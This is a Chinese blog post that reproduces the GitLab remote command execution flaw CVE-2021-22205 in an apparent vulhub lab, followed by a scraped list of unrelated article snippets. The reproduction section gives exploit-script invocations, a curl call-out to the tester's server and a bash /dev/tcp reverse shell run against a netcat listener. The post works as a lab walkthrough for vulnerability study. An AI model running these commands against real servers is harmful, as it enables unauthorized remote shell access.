Big&Bird
Big&Bird

GitLab 远程命令执行漏洞复现(CVE-2021-22205)

目录

    • 一、漏洞描述
    • 二、影响版本
    • 三、环境搭建
    • 四、漏洞复现
      • 4.1、脚本复现
        • 4.1.1、下载利用脚本
        • 4.1.2、检测漏洞是否存在
        • 4.1.3、命令执行
        • 4.1.4、反弹shell
    • 五、解决方案

一、漏洞描述

GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行,可执行系统命令。这是一个严重的问题。它现在在最新版本中得到缓解,漏洞编号CVE-2021-22205。

二、影响版本

11.9 <=  GitLab(CE/EE)< 13.8.8
13.9 <=  GitLab(CE/EE)< 13.9.6
13.10 <= GitLab(CE/EE)< 13.10.3

三、环境搭建

快速搭建,可以使用vulhub

git clone https://github.com/vulhub/vulhub.git
cd vulhub/gitlab/CVE-2021-22205/
docker-compose up -d

环境启动后,访问http://127.0.0.1:8080即可查看到GitLab的登录页面

四、漏洞复现

4.1、脚本复现

4.1.1、下载利用脚本

https://github.com/Al1ex/CVE-2021-22205

4.1.2、检测漏洞是否存在

py CVE-2021-22205.py -v true -t http://192.168.30.56/

GitLab 远程命令执行漏洞复现(CVE-2021-22205)_第1张图片

4.1.3、命令执行

首先起一个http服务

py -m http.server 1234

GitLab 远程命令执行漏洞复现(CVE-2021-22205)_第2张图片
然后命令执行

py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c "curl http://192.168.8.14:1234/1.txt"

通过http服务端查看,命令执行成功
GitLab 远程命令执行漏洞复现(CVE-2021-22205)_第3张图片

4.1.4、反弹shell

#写入反弹shell脚本
py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c "echo 'bash -i >& /dev/tcp/192.168.8.14/6666 0>&1' > /tmp/1.sh"
#赋予shell脚本执行权限
py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c "chmod +x  /tmp/1.sh"
#服务器监听6666端口
nc64.exe -lvnp  6666
#获取git权限
py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c "/bin/bash /tmp/1.sh"

GitLab 远程命令执行漏洞复现(CVE-2021-22205)_第4张图片
GitLab 远程命令执行漏洞复现(CVE-2021-22205)_第5张图片

五、解决方案

升级到最新版本。

要更新 GitLab,请参阅更新页面。要更新 Gitlab Runner,请参阅更新 Runner 页面。

参考:
https://www.freebuf.com/articles/web/303375.html
https://github.com/Al1ex/CVE-2021-22205

你可能感兴趣的:(漏洞复现,gitlab,CVE,安全漏洞)

  • ssrf漏洞复现 ξ流ぁ星ぷ132 安全
    目录基础环境查看phpinfo发现线索探测端口+gopher协议基础环境这里发现一些基础协议呗过滤掉了。但是有个提示的info,于是先看看查看phpinfo发现线索发现这台主机的地址了,于是猜测这个网段应该还有其他主机,试了一下172.21.0.1:80172.21.0.3:80果然如下(0.1是陷阱就不浪费时间了,)探测端口+gopher协议然后对这个172.21.0.3这个主机探测端口发现63
  • 系统迁移从CentOS7.9到Rocky8.9
    我有两台阿里云上的服务器是CentOS7.9,由于CentOS7已经停止支持,后续使用的话会有安全漏洞,所以需要尽快迁移,个人使用的话目前兼容性好的还是RockyLinux8,很多脚本改改就能用了。一、盘点系统和迁移应用查看当前系统发行版版本cat/etc/os-release盘点迁移清单服务器应用部署方式docker镜像来源v1wordpressdockerdockerhubv1zdirdock
  • 第三章:网络安全基础——构建企业数字防线 阿贾克斯的黎明 网络安全web安全安全
    目录第三章:网络安全基础——构建企业数字防线3.1网络协议安全深度解析3.1.1TCP/IP协议栈安全漏洞图谱3.1.2关键安全协议剖析3.2网络攻击全景防御3.2.1OWASPTop102023最新威胁3.2.2高级持续性威胁(APT)防御3.3网络安全设备部署指南3.3.1下一代防火墙(NGFW)配置要点3.3.2IDS/IPS系统部署方案3.4企业网络架构安全设计3.4.1安全分区最佳实践3
  • NodeJS VM2沙箱逃逸漏洞分析【CVE-2023-29199】 R3s3arcm NodeJS漏洞分析node.js安全安全威胁分析
    NodeJSVM2沙箱逃逸漏洞分析【CVE-2023-29199】简介Node.js是一个基于V8引擎的开源、跨平台的JavaScript运行环境,它可以在多个操作系统上运行,包括Windows、macOS和Linux等。Node.js提供了一个运行在服务器端的JavaScript环境,使得开发者可以编写并发的、高效的服务器端应用程序。Node.js使用事件驱动、非阻塞I/O模型来支持并发运行。它
  • 【WEB安全】任意URL跳转
    1.1.漏洞介绍URL跳转漏洞(URLRedirectionVulnerability)又叫开放重定向漏洞(OpenRedirectVulnerability),是一种常见的网络安全漏洞,它存在于许多网站和应用程序中。该漏洞的根本原因是没有对用户提供的URL进行充分的验证和过滤,导致攻击者可以通过构造恶意URL,将用户重定向到任意的网站或应用程序中。1.2.漏洞危害以攻击用户客户端为主,对服务器本
  • 什么是URL 跳转漏洞(URL Redirection Vulnerability) 西京刀客 安全相关安全网络web安全
    文章目录什么是URL跳转漏洞(URLRedirectionVulnerability)漏洞原理修复建议什么是URL跳转漏洞(URLRedirectionVulnerability)URL跳转漏洞(URLRedirectionVulnerability)是指攻击者利用网站或应用程序中未经验证的重定向功能,将用户引导至恶意网站的一种安全漏洞。漏洞原理未验证的重定向参数:网站使用用户提供的URL参数(如
  • 深入理解跨站请求伪造(CSRF):原理、危害与防御 weixin_47233946 信息安全csrf网络前端
    引言跨站请求伪造(Cross-SiteRequestForgery,CSRF)是一种常见的Web安全漏洞,攻击者通过伪装用户身份执行非授权操作。根据OWASP(开放网络应用安全项目)的统计,CSRF曾多次入选十大Web安全威胁。本文将深入剖析CSRF的工作原理、潜在危害及防御策略。一、CSRF攻击原理1.1核心机制CSRF利用用户在目标网站(如银行网站)的已认证会话,诱骗其在不知情时发起恶意请求。
  • Linux 进程创建探秘:为什么 strace 看不到 fork 调用? x.van Linuxlinux运维服务器
    在学习Linux系统编程时,很多初学者会对进程创建机制感到困惑。当使用strace跟踪程序执行时,明明代码中调用了fork(),却在输出中找不到fork系统调用的踪迹,反而看到了clone()。这背后隐藏着Linux进程创建的重要机制,本文将逐步揭开这个谜团。一、Unix进程模型基础:fork与execve的黄金组合1.1进程创建的核心概念在Unix/Linux系统中,进程创建遵循一个经典模型:先
  • 网络安全|填志愿选学校,选哪个学校更出洞?——漏洞库 网安导师小李 网络安全编程程序员web安全网络安全自动化运维pythonjava
    这篇只讲国内漏洞挖掘这一点,在出洞数量上遥遥领先的一般是安全厂商的队伍,但是其中不乏高校、个人的身影。数据来源仅供参考,如果数据涉及错漏,欢迎指正。漏洞库CVE是国际公认最大的漏洞信息库,除此之外国内的漏洞官方信息公开渠道有:国家信息安全漏洞共享平台(CNVD):隶属于国家互联网应急中心(CNCERT),是CNCERT联合国内重要信息系统单位、基础电信运营商、网络安全厂商和软件厂商共同建立的平台。
  • django中如何使用Django REST Framework 517 djangopython后端
    1.项目设置#创建项目目录mkdirdrf_democddrf_demo#创建虚拟环境并激活python-mvenvvenvsourcevenv/bin/activate#Linux/Macvenv\Scripts\activate#Windows#安装依赖pipinstalldjangodjangorestframeworkdjango-cors-headers2.创建Django项目和应用dj
  • GIT漏洞详解
    Git漏洞主要分为两类:Git软件本身的安全漏洞和因配置不当导致的Git仓库泄露。以下是详细解析及防御方案:一、Git软件自身漏洞(CVE漏洞)Git客户端或服务端(如GitLab、GitHub)的代码缺陷可能被利用,导致远程代码执行(RCE)、权限提升等风险。典型案例CVE-2018-11235漏洞类型:远程代码执行(RCE)。触发条件:攻击者构造恶意Git子模块名称,当受害者执行gitclon
  • Linux 权限提升漏洞(CVE-2025-6019):通过 udisksd 和 libblockdev 获取 root 权限(PoC 已公开) FreeBuf- linux网络运维
    SecureLayer7安全研究人员近日公布了一个影响Linux系统的安全漏洞(CVE-2025-6019)的技术细节和概念验证(PoC)利用代码。该漏洞影响依赖udisksd守护进程和libblockdev后端的Linux发行版,包括Fedora和SUSE。在配置不当的环境中,该漏洞可被轻易利用,允许allow_active组中的用户实现本地权限提升(LPE)至root权限。漏洞原理分析报告指出
  • Apache组件遭大规模攻击:Tomcat与Camel高危RCE漏洞引发数千次利用尝试
    漏洞态势分析帕洛阿尔托网络公司Unit42团队最新研究报告显示,针对ApacheTomcat和ApacheCamel关键漏洞的网络攻击正在全球激增。2025年3月披露的这三个远程代码执行(RCE,RemoteCodeExecution)漏洞——CVE-2025-24813(Tomcat)、CVE-2025-27636与CVE-2025-29891(Camel)——已为攻击者提供了系统劫持的直接通道
  • 高危Lucee漏洞(CVE-2025-34074,CVSS 9.4):通过计划任务滥用实现认证RCE,Metasploit模块已公开
    高性能开源CFML(ColdFusionMarkupLanguage)应用服务器Lucee近日曝出严重安全漏洞。该漏洞编号为CVE-2025-34074,CVSS评分高达9.4,允许已认证管理员通过滥用Lucee计划任务功能执行任意远程代码。漏洞技术细节Lucee凭借对Java集成、HTTP、ORM和动态脚本的支持,被开发者广泛用于构建可扩展的高速应用程序。但这种灵活性若缺乏严格控制,也会带来严重
  • MCP Inspector 高危远程代码执行漏洞威胁AI开发者(CVE-2025-49596) FreeBuf- MCPAIInspector
    漏洞概述2025年6月,Oligo安全研究团队披露了Anthropic公司ModelContextProtocol(MCP,模型上下文协议)框架核心调试工具MCPInspector中存在的高危远程代码执行(RemoteCodeExecution,RCE)漏洞CVE-2025-49596。该漏洞CVSS评分为9.4分,攻击者仅需通过浏览器标签页即可完全控制开发者的计算机。图片来源:Oligo安全研究
  • 如何升级Node.js版本:详细指南 川星弦 node.js
    Node.js作为JavaScript运行时环境,广泛应用于服务器端开发。随着Node.js的不断更新,及时升级到最新版本可以带来新特性、性能提升以及安全漏洞的修复。本文将详细介绍几种常见的Node.js升级方法,帮助你轻松完成版本更新。方法一:使用Node.js官方安装程序访问Node.js官方网站:打开Node.js官网,下载适合你操作系统的最新版本安装程序。运行安装程序:双击下载的安装程序,
  • CICD[软件安装]:docker安装gitlab
    1、创建gitlab工作目录sudomkdir-p/usr/local/gitlab/{config,logs,data}下载镜像sudodockerpullgitlab/gitlab-ce:17.11.12、编写docker-compose.ymlcd/usr/local/gitlabsudovidocker-compose.yml写入内容:version:'3.6'services:gitla
  • CICD[导航]、docker+gitlab+harbor+jenkins从安装到部署
    一、安装CICD[软件安装]:docker安装gitlab-CSDN博客CICD[软件安装]:ubuntu安装jenkins-CSDN博客CICD[软件安装]:ubuntu安装私有镜像仓库-Harbor-CSDN博客CICD[软件安装]:ubuntu24安装Docker-CSDN博客二、镜像执行CICD[构建镜像]:构建django使用的docker镜像-CSDN博客三、jenkins脚本CICD
  • 在 Mac 上使用 Git 拉取项目:完整指南 笑衬人心。 macosgit
    目录前置条件安装Git配置Git生成SSHKey(推荐方式)将SSHKey添加到GitHub/GitLab克隆(拉取)项目常见问题排查1.前置条件一台运行macOS的电脑已安装XcodeCommandLineTools(Git和编译工具依赖)GitHub、GitLab或其他Git平台账号项目仓库地址(可为SSH或HTTPS格式)2.安装Git方法一:通过Homebrew安装(推荐)brewinst
  • C++ 11 set 插入元素 维护唯一性原理 呱呱344 笔记c++set
    环境:gccversion11.4.0(Ubuntu11.4.0-1ubuntu1~22.04)std::set的底层红黑树在插入元素时需要频繁调用比较函数来维护有序性和唯一性源码://位置/usr/include/c++/11/bits/stl_tree.h//插入逻辑_Rb_tree::#if__cplusplus>=201103L_M_insert_unique(_Arg&&__v)#els
  • Kerberos 漏洞 IT 青年 0o漏洞
    前言Kerberos漏洞涉及多个关键安全缺陷,主要包括MS14-068提权漏洞、CVE-2024-43639远程代码执行漏洞,以及CVE-2025系列新披露漏洞。一、MS14-068提权漏洞(CVE-2014-6324)漏洞影响受影响系统:WindowsServer2003、2008、2008R2、2012、2012R2。漏洞类型:权限提升漏洞,允许普通域用户提升至域管理员权限。CVSS评分:未公
  • 初识.git文件泄露 wyjcxyyy git
    .git文件泄露当在一个空目录执行gitinit时,Git会创建一个.git目录。这个目录包含所有的Git存储和操作的对象。如果想备份或复制一个版本库,只需把这个目录拷贝至另一处就可以了这是一种常见的安全漏洞,指的是网站的.git目录被意外暴露在公网上,导致攻击者可以通过访问.git目录获取网站的源代码、版本历史、配置文件等敏感信息。这种漏洞通常是由于服务器配置不当或开发人员的疏忽导致的。如何检测
  • 前端安全 常见的攻击类型及防御措施
    1.跨站脚本攻击(XSS)描述:跨站脚本(XSS:Cross-SiteScripting)是一种安全漏洞,允许攻击者向网站注入恶意客户端代码。该代码由受害者执行从而让攻击者绕过访问控制并冒充用户。XSS攻击可以分为三类:存储(持久)、反射(非持久)或基于DOM。存储型XSS攻击注入的恶意脚本永久存储在目标服务器上。当用户访问时,代码被加载并执行。举例:比如在留言板中添加恶意代码,如果服务器没有防范
  • 基于Web门户架构的监狱内网改版实践:值班排班系统设计与信创适配探讨 bbsh2099 方案与思考WebFuture
    面向监狱内网改版场景的门户平台技术架构与智能排班实践关键词:监狱内网改版、监狱内部网站改版、值班排班系统、信创适配、智能门户架构一、场景背景与问题分析在信创国产化、等级保护合规、政务集约化趋势持续推进的背景下,传统监狱内部网站普遍面临如下问题:架构陈旧,安全漏洞频出,难以满足等级保护三级要求;不兼容国产软硬件栈,不支持国密算法与国产数据库;缺乏智能化排班系统,无法满足“岗哨轮班制”等典型排班制度;
  • XSLT模版注入漏洞
    XSLT模版注入漏洞模版注入漏洞根因(SSTI,服务器端模版注入)XSLT介绍XSLT模版注入漏洞关键点漏洞触发场景漏洞复现环境引入依赖poc修复方案限制document读取路径限制使用`xsl:include`、`xsl:import`引用外部实体避免暴露java的危险类和方法完整代码(包含修复)参考模版注入漏洞根因(SSTI,服务器端模版注入)由于模版内容部分或全部被外部控制,导致在模版加载或
  • XSLT注入与安全修复方法
    XSLT注入概述XSLT注入是一种安全漏洞,攻击者通过操纵XSLT(可扩展样式表语言转换)的输入参数或样式表内容,执行恶意操作(如文件读取、远程代码执行、服务端请求伪造)。当用户输入未经严格过滤直接嵌入XSLT处理流程时,可能触发此类漏洞。常见攻击场景与危害敏感文件读取xslt危害:泄露服务器敏感信息。远程代码执行(依赖扩展函数)xslt危害:服务器被完全控制。SSRF(服务端请求伪造)xslt危
  • ubuntu20.04自建代码托管平台-Gitlab HuangFJ- VMware虚拟机ubuntulinux服务器git
    介绍由于gitlab需要在linux操作系统部署,因此这篇文章涉及以下关键点1.虚拟机VMware安装ubuntu2.ubuntu修改下载源问题3.openssh、vim、net-tools等插件下载4.ubuntu下载gitlab免费版:5.gitlab相关命令6.使用浏览器访问gitlab7.初始密码/修改密码8.如何新增用户并发送邮件环境ubuntu-20.04.1-desktop-amd6
  • Ubuntu 20.04 搭建gitlab
    更新apt源sudoaptupdate安装依赖项#PostfixConfiguration选择Noconfiguration就好sudoapt-getinstallcurlopenssh-serverca-certificatespostfix下载gitlab-ce软件包sudowgethttps://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/ubuntu/po
  • 2024年最新4大典型安全漏洞是怎么来的?如何解决?,【2024网络安全最新学习路线】 2401_84297193 程序员web安全学习网络
    还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!】93道网络安全面试题内容实在太多,不一一截图了黑客学习资源推荐最后给大家分享一份全套的网络安全
  • 什么是持续集成/持续交付(CI/CD)? 元圆源 ci/cd
    基本概念CI/CD旨在通过自动化流程提高代码质量、加快发布速度CI(ContinuousIntegration,持续集成)CD(ContinuousDelivery/Deployment,持续交付/持续部署)CI持续集成目标频繁加粗样式将代码合并到主干、尽早发现错误流程开发者提交代码到共享仓库,如GitLab/GitHub自动出发构建,编译、依赖安装运行自动化测试,单元测试、集成测试优势快速发现B
  • java数字签名三种方式 知了ing javajdk
    以下3钟数字签名都是基于jdk7的 1,RSA String password="test"; // 1.初始化密钥 KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA"); keyPairGenerator.initialize(51
  • Hibernate学习笔记 caoyong Hibernate
    1>、Hibernate是数据访问层框架,是一个ORM(Object Relation Mapping)框架,作者为:Gavin King 2>、搭建Hibernate的开发环境      a>、添加jar包:      aa>、hibernatte开发包中/lib/required/所
  • 设计模式之装饰器模式Decorator(结构型) 漂泊一剑客 Decorator
    1. 概述        若你从事过面向对象开发,实现给一个类或对象增加行为,使用继承机制,这是所有面向对象语言的一个基本特性。如果已经存在的一个类缺少某些方法,或者须要给方法添加更多的功能(魅力),你也许会仅仅继承这个类来产生一个新类—这建立在额外的代码上。      
  • 读取磁盘文件txt,并输入String 一炮送你回车库 String
    public static void main(String[] args) throws IOException {    String fileContent = readFileContent("d:/aaa.txt");    System.out.println(fileContent);   
  • js三级联动下拉框 3213213333332132 三级联动
    //三级联动 省/直辖市<select id="province"></select> 市/省直辖<select id="city"></select> 县/区 <select id="area"></select>
  • erlang之parse_transform编译选项的应用 616050468 parse_transform游戏服务器属性同步abstract_code
             最近使用erlang重构了游戏服务器的所有代码,之前看过C++/lua写的服务器引擎代码,引擎实现了玩家属性自动同步给前端和增量更新玩家数据到数据库的功能,这也是现在很多游戏服务器的优化方向,在引擎层面去解决数据同步和数据持久化,数据发生变化了业务层不需要关心怎么去同步给前端。由于游戏过程中玩家每个业务中玩家数据更改的量其实是很少
  • JAVA JSON的解析 darkranger java
    // { // “Total”:“条数”, // Code: 1, // // “PaymentItems”:[ // { // “PaymentItemID”:”支款单ID”, // “PaymentCode”:”支款单编号”, // “PaymentTime”:”支款日期”, // ”ContractNo”:”合同号”, //
  • POJ-1273-Drainage Ditches aijuans ACM_POJ
    POJ-1273-Drainage Ditches http://poj.org/problem?id=1273 基本的最大流,按LRJ的白书写的 #include<iostream> #include<cstring> #include<queue> using namespace std; #define INF 0x7fffffff int ma
  • 工作流Activiti5表的命名及含义 atongyeye 工作流Activiti
    activiti5 - http://activiti.org/designer/update在线插件安装 activiti5一共23张表 Activiti的表都以ACT_开头。 第二部分是表示表的用途的两个字母标识。 用途也和服务的API对应。 ACT_RE_*: 'RE'表示repository。 这个前缀的表包含了流程定义和流程静态资源 (图片,规则,等等)。 A
  • android的广播机制和广播的简单使用 百合不是茶 android广播机制广播的注册
          Android广播机制简介 在Android中,有一些操作完成以后,会发送广播,比如说发出一条短信,或打出一个电话,如果某个程序接收了这个广播,就会做相应的处理。这个广播跟我们传统意义中的电台广播有些相似之处。之所以叫做广播,就是因为它只负责“说”而不管你“听不听”,也就是不管你接收方如何处理。另外,广播可以被不只一个应用程序所接收,当然也可能不被任何应
  • Spring事务传播行为详解 bijian1013 javaspring事务传播行为
            在service类前加上@Transactional,声明这个service所有方法需要事务管理。每一个业务方法开始时都会打开一个事务。         Spring默认情况下会对运行期例外(RunTimeException)进行事务回滚。这
  • eidtplus operate 征客丶 eidtplus
    开启列模式: Alt+C 鼠标选择   OR   Alt+鼠标左键拖动 列模式替换或复制内容(多行): 右键-->格式-->填充所选内容-->选择相应操作 OR Ctrl+Shift+V(复制多行数据,必须行数一致) -------------------------------------------------------
  • 【Kafka一】Kafka入门 bit1129 kafka
    这篇文章来自Spark集成Kafka(http://bit1129.iteye.com/blog/2174765),这里把它单独取出来,作为Kafka的入门吧   下载Kafka http://mirror.bit.edu.cn/apache/kafka/0.8.1.1/kafka_2.10-0.8.1.1.tgz 2.10表示Scala的版本,而0.8.1.1表示Kafka
  • Spring 事务实现机制 BlueSkator spring代理事务
    Spring是以代理的方式实现对事务的管理。我们在Action中所使用的Service对象,其实是代理对象的实例,并不是我们所写的Service对象实例。既然是两个不同的对象,那为什么我们在Action中可以象使用Service对象一样的使用代理对象呢?为了说明问题,假设有个Service类叫AService,它的Spring事务代理类为AProxyService,AService实现了一个接口
  • bootstrap源码学习与示例:bootstrap-dropdown(转帖) BreakingBad bootstrapdropdown
    bootstrap-dropdown组件是个烂东西,我读后的整体感觉。 一个下拉开菜单的设计: <ul class="nav pull-right"> <li id="fat-menu" class="dropdown">
  • 读《研磨设计模式》-代码笔记-中介者模式-Mediator bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* * 中介者模式(Mediator):用一个中介对象来封装一系列的对象交互。 * 中介者使各对象不需要显式地相互引用,从而使其耦合松散,而且可以独立地改变它们之间的交互。 * * 在我看来,Mediator模式是把多个对象(
  • 常用代码记录 chenjunt3 UIExcelJ#
      1、单据设置某行或某字段不能修改 //i是行号,"cash"是字段名称 getBillCardPanelWrapper().getBillCardPanel().getBillModel().setCellEditable(i, "cash", false); //取得单据表体所有项用以上语句做循环就能设置整行了 getBillC
  • 搜索引擎与工作流引擎 comsci 算法工作搜索引擎网络应用
          最近在公司做和搜索有关的工作,(只是简单的应用开源工具集成到自己的产品中)工作流系统的进一步设计暂时放在一边了,偶然看到谷歌的研究员吴军写的数学之美系列中的搜索引擎与图论这篇文章中的介绍,我发现这样一个关系(仅仅是猜想)   -----搜索引擎和流程引擎的基础--都是图论,至少像在我在JWFD中引擎算法中用到的是自定义的广度优先
  • oracle Health Monitor daizj oracleHealth Monitor
    About Health Monitor Beginning with Release 11g, Oracle Database includes a framework called Health Monitor for running diagnostic checks on the database. About Health Monitor Checks Health M
  • JSON字符串转换为对象 dieslrae javajson
        作为前言,首先是要吐槽一下公司的脑残编译部署方式,web和core分开部署本来没什么问题,但是这丫居然不把json的包作为基础包而作为web的包,导致了core端不能使用,而且我们的core是可以当web来用的(不要在意这些细节),所以在core中处理json串就是个问题.没办法,跟编译那帮人也扯不清楚,只有自己写json的解析了.   
  • C语言学习八结构体,综合应用,学生管理系统 dcj3sjt126com C语言
    实现功能的代码: # include <stdio.h> # include <malloc.h> struct Student { int age; float score; char name[100]; }; int main(void) { int len; struct Student * pArr; int i,
  • vagrant学习笔记 dcj3sjt126com vagrant
    想了解多主机是如何定义和使用的, 所以又学习了一遍vagrant   1. vagrant virtualbox 下载安装 https://www.vagrantup.com/downloads.html https://www.virtualbox.org/wiki/Downloads   查看安装在命令行输入vagrant     2.
  • 14.性能优化-优化-软件配置优化 frank1234 软件配置性能优化
    1.Tomcat线程池 修改tomcat的server.xml文件: <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" maxThreads="1200" m
  • 一个不错的shell 脚本教程 入门级 HarborChung linuxshell
    一个不错的shell 脚本教程 入门级 建立一个脚本   Linux中有好多中不同的shell,但是通常我们使用bash (bourne again shell) 进行shell编程,因为bash是免费的并且很容易使用。所以在本文中笔者所提供的脚本都是使用bash(但是在大多数情况下,这些脚本同样可以在 bash的大姐,bourne shell中运行)。   如同其他语言一样
  • Spring4新特性——核心容器的其他改进 jinnianshilongnian spring动态代理spring4依赖注入
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • Linux设置tomcat开机启动 liuxingguome tomcatlinux开机自启动
    执行命令sudo gedit /etc/init.d/tomcat6 然后把以下英文部分复制过去。(注意第一句#!/bin/sh如果不写,就不是一个shell文件。然后将对应的jdk和tomcat换成你自己的目录就行了。 #!/bin/bash # # /etc/rc.d/init.d/tomcat # init script for tomcat precesses
  • 第13章 Ajax进阶(下) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • Troubleshooting Crystal Reports off BW blueoxygen BO
    http://wiki.sdn.sap.com/wiki/display/BOBJ/Troubleshooting+Crystal+Reports+off+BW#TroubleshootingCrystalReportsoffBW-TracingBOE   Quite useful, especially this part: SAP BW connectivity For t
  • Java开发熟手该当心的11个错误 tomcat_oracle javajvm多线程单元测试
    #1、不在属性文件或XML文件中外化配置属性。比如,没有把批处理使用的线程数设置成可在属性文件中配置。你的批处理程序无论在DEV环境中,还是UAT(用户验收 测试)环境中,都可以顺畅无阻地运行,但是一旦部署在PROD 上,把它作为多线程程序处理更大的数据集时,就会抛出IOException,原因可能是JDBC驱动版本不同,也可能是#2中讨论的问题。如果线程数目 可以在属性文件中配置,那么使它成为
  • 正则表达式大全 yang852220741 html编程正则表达式
    今天向大家分享正则表达式大全,它可以大提高你的工作效率 正则表达式也可以被当作是一门语言,当你学习一门新的编程语言的时候,他们是一个小的子语言。初看时觉得它没有任何的意义,但是很多时候,你不得不阅读一些教程,或文章来理解这些简单的描述模式。 一、校验数字的表达式 数字:^[0-9]*$ n位的数字:^\d{n}$ 至少n位的数字:^\d{n,}$ m-n位的数字:^\d{m,n}$
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他